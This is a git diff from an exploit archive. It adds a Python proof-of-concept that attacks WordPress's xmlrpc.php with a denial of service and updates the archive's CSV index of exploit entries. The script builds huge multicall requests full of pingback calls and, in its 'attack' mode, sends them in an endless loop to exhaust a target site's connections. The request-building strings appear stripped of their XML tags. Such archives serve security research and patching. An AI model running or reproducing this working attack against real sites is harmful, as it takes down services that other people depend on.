diff --git a/exploits/php/webapps/47800.py b/exploits/php/webapps/47800.py
new file mode 100755
index 000000000..dbdd22977
--- /dev/null
+++ b/exploits/php/webapps/47800.py
@@ -0,0 +1,103 @@
+#!/usr/bin/env python
+# WordPress <= 5.3.? Denial-of-Service PoC
+# Abusing pingbacks+xmlrpc multicall to exhaust connections
+# @roddux 2019 | Arcturus Security | labs.arcturus.net
+# TODO:
+# - Try and detect a pingback URL on target site
+# - Optimise number of entries per request, check class-wp-xmlrpc-server.php
+from urllib.parse import urlparse
+import sys, uuid, urllib3, requests
+urllib3.disable_warnings()
+
+DEBUG = True
+def dprint(X):
+ if DEBUG: print(X)
+
+COUNT=0
+def build_entry(pingback,target):
+ global COUNT
+ COUNT +=1
+ entry = "methodNamepingback.ping"
+ entry += f"params{pingback}/{COUNT}"
+ #entry += f"params{pingback}/{uuid.uuid4()}"
+ entry += f"{target}/?p=1"
+ #entry += f"{target}/#e" # taxes DB more
+ return entry
+
+def build_request(pingback,target,entries):
+ prefix = "system.multicall"
+ suffix = ""
+ request = prefix
+ for _ in range(0,entries): request += build_entry(pingback,target)
+ request += suffix
+ return request
+
+def usage_die():
+ print(f"[!] Usage: {sys.argv[0]} ")
+ exit(1)
+
+def get_args():
+ if len(sys.argv) != 4: usage_die()
+ action = sys.argv[1]
+ pingback = sys.argv[2]
+ target = sys.argv[3]
+ if action not in ("check","attack"): usage_die()
+ for URL in (pingback,target):
+ res = urlparse(URL)
+ if not all((res.scheme,res.netloc)): usage_die()
+ return (action,pingback,target)
+
+def main(action,pingback,target):
+ print("[>] WordPress <= 5.3.? Denial-of-Service PoC")
+ print("[>] @roddux 2019 | Arcturus Security | labs.arcturus.net")
+ # he checc
+ if action == "check": entries = 2
+ # he attacc
+ elif action == "attack": entries = 2000
+ # but most importantly
+ print(f"[+] Running in {action} mode")
+ # he pingbacc
+ print(f"[+] Got pingback URL \"{pingback}\"")
+ print(f"[+] Got target URL \"{target}\"")
+ print(f"[+] Building {entries} pingback calls")
+ # entries = 1000 # TESTING
+ xmldata = build_request(pingback,target,entries)
+ dprint("[+] Request:\n")
+ dprint(xmldata+"\n")
+ print(f"[+] Request size: {len(xmldata)} bytes")
+ if action == "attack":
+ print("[+] Starting attack loop, CTRL+C to stop...")
+ rcount = 0
+ try:
+ while True:
+ try:
+ resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=.2)
+ #dprint(resp.content.decode("UTF-8")[0:500]+"\n")
+ if resp.status_code != 200:
+ print(f"[!] Received odd status ({resp.status_code}) -- DoS successful?")
+ except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
+ pass
+ rcount += 1
+ print(f"\r[+] Requests sent: {rcount}",end="")
+ except KeyboardInterrupt:
+ print("\n[>] Attack finished",end="\n\n")
+ exit(0)
+ elif action == "check":
+ print("[+] Sending check request")
+ try:
+ resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=10)
+ if resp.status_code != 200:
+ print(f"[!] Received odd status ({resp.status_code}) -- check target url")
+ print("[+] Request sent")
+ print("[+] Response headers:\n")
+ print(resp.headers)
+ print("[+] Response dump:")
+ print(resp.content.decode("UTF-8"))
+ print("[+] Here's the part where you figure out if it's vulnerable, because I CBA to code it")
+ except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
+ print("[!] Connection error")
+ exit(1)
+ print("[>] Check finished")
+
+if __name__ == "__main__":
+ main(*get_args())
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e48b40e8a..2a358917f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -41991,14 +41991,14 @@ id,file,description,date,author,type,platform,port
47613,exploits/aspx/webapps/47613.txt,"Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
47614,exploits/hardware/webapps/47614.txt,"Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting",2019-11-12,LiquidWorm,webapps,hardware,
47611,exploits/aspx/webapps/47611.txt,"Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
-47516,exploits/php/webapps/47516.txt,"Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
-47517,exploits/php/webapps/47517.txt,"Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
-47518,exploits/php/webapps/47518.txt,"Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
+47516,exploits/php/webapps/47516.txt,"WordPress Plugin FooGallery 1.8.12 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
+47517,exploits/php/webapps/47517.txt,"WordPress Plugin Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
+47518,exploits/php/webapps/47518.txt,"WordPress Plugin Popup Builder 3.49 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
47520,exploits/php/webapps/47520.py,"Restaurant Management System 1.0 - Remote Code Execution",2019-10-17,"Ibad Shah",webapps,php,
47524,exploits/php/webapps/47524.py,"Joomla! 3.4.6 - Remote Code Execution",2019-10-18,"Alessandro Groppo",webapps,php,
47537,exploits/linux/webapps/47537.txt,"Rocket.Chat 2.1.0 - Cross-Site Scripting",2019-10-23,3H34N,webapps,linux,
47539,exploits/php/webapps/47539.rb,"Joomla! 3.4.6 - Remote Code Execution (Metasploit)",2019-10-23,"Alessandro Groppo",webapps,php,
-47540,exploits/php/webapps/47540.txt,"Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection",2019-10-24,"Lucian Ioan Nitescu",webapps,php,
+47540,exploits/php/webapps/47540.txt,"WordPress Plugin Sliced Invoices 3.8.2 - 'post' SQL Injection",2019-10-24,"Lucian Ioan Nitescu",webapps,php,
47541,exploits/hardware/webapps/47541.txt,"AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control",2019-10-24,Luca.Chiou,webapps,hardware,
47542,exploits/hardware/webapps/47542.txt,"AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection",2019-10-24,Luca.Chiou,webapps,hardware,
47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php,
@@ -42009,11 +42009,11 @@ id,file,description,date,author,type,platform,port
47550,exploits/php/webapps/47550.txt,"delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection",2019-10-28,cakes,webapps,php,
47553,exploits/php/webapps/47553.md,"PHP-FPM + Nginx - Remote Code Execution",2019-10-28,"Emil Lerner",webapps,php,
47555,exploits/php/webapps/47555.py,"rConfig 3.9.2 - Remote Code Execution",2019-10-29,Askar,webapps,php,
-47557,exploits/php/webapps/47557.txt,"Wordpress 5.2.4 - Cross-Origin Resource Sharing",2019-10-29,"Milad Khoshdel",webapps,php,
+47557,exploits/php/webapps/47557.txt,"WordPress Core 5.2.4 - Cross-Origin Resource Sharing",2019-10-29,"Milad Khoshdel",webapps,php,
47560,exploits/json/webapps/47560.rb,"Ajenti 2.1.31 - Remote Code Exection (Metasploit)",2019-10-30,"Onur ER",webapps,json,
47561,exploits/xml/webapps/47561.txt,"Citrix StoreFront Server 7.15 - XML External Entity Injection",2019-10-30,"Vahagn Vardanyan",webapps,xml,
47562,exploits/hardware/webapps/47562.sh,"iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure",2019-10-30,LiquidWorm,webapps,hardware,
-47567,exploits/php/webapps/47567.txt,"Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection",2019-10-31,"Princy Edward",webapps,php,
+47567,exploits/php/webapps/47567.txt,"WordPress Plugin Google Review Slider 6.1 - 'tid' SQL Injection",2019-10-31,"Princy Edward",webapps,php,
47569,exploits/php/webapps/47569.txt,"TheJshen contentManagementSystem 1.04 - 'id' SQL Injection",2019-11-01,cakes,webapps,php,
47571,exploits/linux/webapps/47571.txt,"ownCloud 10.3.0 stable - Cross-Site Request Forgery",2019-11-01,"Ozer Goker",webapps,linux,
47572,exploits/java/webapps/47572.py,"Apache Solr 8.2.0 - Remote Code Execution",2019-11-01,@l3x_wong,webapps,java,
@@ -42070,7 +42070,7 @@ id,file,description,date,author,type,platform,port
47691,exploits/php/webapps/47691.sh,"OpenNetAdmin 18.1.1 - Remote Code Execution",2019-11-20,mattpascoe,webapps,php,
47702,exploits/hardware/webapps/47702.txt,"TestLink 1.9.19 - Persistent Cross-Site Scripting",2019-11-21,"Milad Khoshdel",webapps,hardware,
47704,exploits/hardware/webapps/47704.txt,"Network Management Card 6.2.0 - Host Header Injection",2019-11-21,"Amal E Thamban",webapps,hardware,
-47720,exploits/php/webapps/47720.txt,"Wordpress 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php,
+47720,exploits/php/webapps/47720.txt,"WordPress Core 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php,
47722,exploits/android/webapps/47722.py,"Mersive Solstice 2.8.0 - Remote Code Execution",2019-11-28,"Alexandre Teyar",webapps,android,
47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,
47730,exploits/php/webapps/47730.txt,"SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery",2019-12-02,LiquidWorm,webapps,php,
@@ -42106,3 +42106,4 @@ id,file,description,date,author,type,platform,port
47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx,
47796,exploits/hardware/webapps/47796.txt,"Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation",2019-12-19,Vulnerability-Lab,webapps,hardware,
47798,exploits/php/webapps/47798.txt,"phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting",2019-12-20,"Chris Inzinga",webapps,php,
+47800,exploits/php/webapps/47800.py,"WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service",2019-12-17,roddux,webapps,php,